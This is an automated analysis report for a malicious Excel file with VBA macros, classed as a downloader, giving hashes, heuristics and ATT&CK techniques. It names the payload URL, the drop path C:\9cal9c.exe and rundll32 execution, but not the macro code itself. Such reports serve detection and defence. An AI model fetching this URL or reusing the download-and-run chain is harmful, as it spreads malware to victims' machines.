Xls.Downloader.b83ac4c497e169b5-9980307-0 Office (OLE) / .XLS malware analysis — malicious · 02936f6a010516de

MALICIOUS

Office (OLE) / .XLS

63.5 KB Created: 2022-11-10 07:57:43 Authoring application: Microsoft Excel First seen: 2022-11-10

MD5: 21a0f506b9f80acb4d0b8eee78ec809a SHA-1: eed781c685bfe69793a2c5675996d33b5f329915 SHA-256: 02936f6a010516dec9a7358480da9a307fd2c7ceb1eb3eb50603fad3270376a8

188 Risk Score

Malware Insights

Xls.Downloader.b83ac4c497e169b5-9980307-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic for Applications T1059.003 Windows Command Shell T1105 Ingress Tool Transfer

The sample is an Excel file containing VBA macros. The macros utilize the Shell() function to execute commands and CreateObject() to potentially download and save a second-stage payload. The reconstructed URL 'http://1y2ou4bi60ci.com/c12o-m' is used to fetch this payload, which is then saved as 'C:\9cal9c.exe' and executed via 'rundll32.exe'.

Heuristics 5

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
ClamAV: Xls.Downloader.b83ac4c497e169b5-9980307-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.b83ac4c497e169b5-9980307-0
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas` `027e1662a91ca9e45724cd5eba018a07f94311c2655f7f5e5f4fe6e85aa3f3e8`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3119 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.